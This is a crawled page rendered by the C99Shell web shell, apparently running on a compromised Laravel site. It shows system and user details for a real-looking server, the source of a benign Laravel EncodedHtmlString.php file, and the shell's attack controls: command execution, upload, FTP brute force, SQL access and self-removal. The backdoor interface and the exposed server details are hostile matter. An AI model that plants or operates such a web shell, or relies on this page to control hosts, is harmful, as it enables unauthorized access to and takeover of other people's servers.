!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/gwp.picotech.app/public_html/vendor/laravel/framework/src/Illuminate/Support/   drwxr-xr-x
Free 28.68 GB of 117.98 GB (24.31%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     EncodedHtmlString.php (2.51 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Illuminate\Support;

use 
BackedEnum;
use 
Illuminate\Contracts\Support\DeferringDisplayableValue;
use 
Illuminate\Contracts\Support\Htmlable;

class 
EncodedHtmlString extends HtmlString
{
    
/**
     * The HTML string.
     *
     * @var \Illuminate\Contracts\Support\DeferringDisplayableValue|\Illuminate\Contracts\Support\Htmlable|\BackedEnum|string|int|float|null
     */
    
protected $html;

    
/**
     * The callback that should be used to encode the HTML strings.
     *
     * @var callable|null
     */
    
protected static $encodeUsingFactory;

    
/**
     * Create a new encoded HTML string instance.
     *
     * @param  \Illuminate\Contracts\Support\DeferringDisplayableValue|\Illuminate\Contracts\Support\Htmlable|\BackedEnum|string|int|float|null  $html
     * @param  bool  $doubleEncode
     */
    
public function __construct($html '', protected bool $doubleEncode true)
    {
        
parent::__construct($html);
    }

    
/**
     * Convert the special characters in the given value.
     *
     * @internal
     *
     * @param  string|null  $value
     * @param  int  $withQuote
     * @param  bool  $doubleEncode
     * @return string
     */
    
public static function convert($valuebool $withQuote truebool $doubleEncode true)
    {
        
$flag $withQuote ENT_QUOTES ENT_NOQUOTES;

        return 
htmlspecialchars($value ?? ''$flag ENT_SUBSTITUTE'UTF-8'$doubleEncode);
    }

    
/**
     * Get the HTML string.
     *
     * @return string
     */
    
#[\Override]
    public function 
toHtml()
    {
        
$value $this->html;

        if (
$value instanceof DeferringDisplayableValue) {
            
$value $value->resolveDisplayableValue();
        }

        if (
$value instanceof Htmlable) {
            return 
$value->toHtml();
        }

        if (
$value instanceof BackedEnum) {
            
$value $value->value;
        }

        return (static::
$encodeUsingFactory ?? function ($value$doubleEncode) {
            return static::
convert($valuedoubleEncode$doubleEncode);
        })(
$value$this->doubleEncode);
    }

    
/**
     * Set the callable that will be used to encode the HTML strings.
     *
     * @param  callable|null  $factory
     * @return void
     */
    
public static function encodeUsing(?callable $factory null)
    {
        static::
$encodeUsingFactory $factory;
    }

    
/**
     * Flush the class's global state.
     *
     * @return void
     */
    
public static function flushState()
    {
        static::
$encodeUsingFactory null;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0032 ]--